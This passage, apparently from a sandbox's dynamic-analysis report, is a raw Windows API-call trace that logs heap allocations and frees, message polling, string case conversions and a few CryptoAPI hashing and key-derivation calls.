dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.562] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.562] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.563] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.563] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.563] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.563] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.563] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.563] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.563] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.563] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.563] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.563] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0258.564] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.564] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0258.564] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.564] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.564] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.564] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0258.564] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.564] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.564] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.564] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.564] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0258.564] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.564] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.564] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.565] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.565] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.565] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.565] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.565] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.565] CryptHashData (hHash=0xaa57a0, pbData=0x24b1698, dwDataLen=0x3, dwFlags=0x1) returned 1 [0258.565] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.565] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.565] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.565] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.565] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.565] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.565] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.565] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.565] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0258.566] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.566] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0258.566] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.566] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.566] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.566] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa57a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5760) returned 1 [0258.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0258.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0258.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0258.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0258.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0258.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0258.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0258.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0258.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0258.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0258.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0258.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0258.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0258.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0258.571] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0258.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0258.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0258.572] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0258.572] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0258.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.572] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.573] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.573] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0258.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.574] HeapFree 